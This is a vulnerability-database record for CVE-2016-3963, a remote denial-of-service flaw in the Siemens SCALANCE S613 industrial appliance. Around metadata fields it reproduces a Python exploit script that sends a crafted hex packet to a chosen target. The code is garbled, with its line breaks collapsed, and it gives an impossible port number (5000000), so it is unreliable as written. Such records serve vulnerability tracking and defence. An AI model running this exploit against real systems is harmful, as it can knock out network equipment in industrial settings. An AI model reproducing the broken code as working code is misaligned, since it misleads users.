ID

VAR-E-201805-0174


CVE

cve_id:CVE-2016-3963

Trust: 1.5

sources: PACKETSTORM: 147853 // EXPLOIT-DB: 44721

EDB ID

44721


TITLE

Siemens SCALANCE S613 - Remote Denial of Service - Linux dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 44721

DESCRIPTION

Siemens SCALANCE S613 - Remote Denial of Service. CVE-2016-3963 . dos exploit for Linux platform

Trust: 0.6

sources: EXPLOIT-DB: 44721

AFFECTED PRODUCTS

vendor:siemensmodel:scalance s613scope: - version: -

Trust: 2.1

sources: PACKETSTORM: 147853 // EXPLOIT-DB: 44721 // EDBNET: 97959

EXPLOIT

# Exploit Title: Siemens SCALANCE S613 - Remote Denial of Service
# Date: 2018-05-23
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.siemens.com/
# Version: SCALANCE S613 (MLFB: 6GK5613-0BA00-2AA3): All versions.
# Tested on: Kali Linux
# CVE: CVE-2016-3963

#!/usr/bin/python

import socket import sys if len(sys.argv) < 2: print('Usage: ' +
sys.argv[0] + ' [target]') sys.exit(1) print('Sending packet to ' +
sys.argv[1] + ' ...') payload = bytearray('11 49 00 00 00 00 00 00 00 00 00
00 00 00 00 00 28 9E'.replace(' ', '').decode('hex')) sock =
socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.sendto(payload,
(sys.argv[1], 5000000))

Trust: 1.0

sources: EXPLOIT-DB: 44721

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 44721

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 44721

TYPE

Remote Denial of Service

Trust: 1.6

sources: EXPLOIT-DB: 44721 // EDBNET: 97959

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:denial of service

Trust: 0.5

sources: PACKETSTORM: 147853

CREDITS

t4rkd3vilz

Trust: 0.6

sources: EXPLOIT-DB: 44721

EXTERNAL IDS

db:EXPLOIT-DBid:44721

Trust: 1.6

db:NVDid:CVE-2016-3963

Trust: 1.5

db:EDBNETid:97959

Trust: 0.6

db:PACKETSTORMid:147853

Trust: 0.5

sources: PACKETSTORM: 147853 // EXPLOIT-DB: 44721 // EDBNET: 97959

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2016-3963

Trust: 1.5

url:https://www.exploit-db.com/exploits/44721/

Trust: 0.6

sources: PACKETSTORM: 147853 // EXPLOIT-DB: 44721 // EDBNET: 97959

SOURCES

db:PACKETSTORMid:147853
db:EXPLOIT-DBid:44721
db:EDBNETid:97959

LAST UPDATE DATE

2022-07-27T09:11:22.109000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:147853date:2018-05-24T18:05:01
db:EXPLOIT-DBid:44721date:2018-05-23T00:00:00
db:EDBNETid:97959date:2018-05-23T00:00:00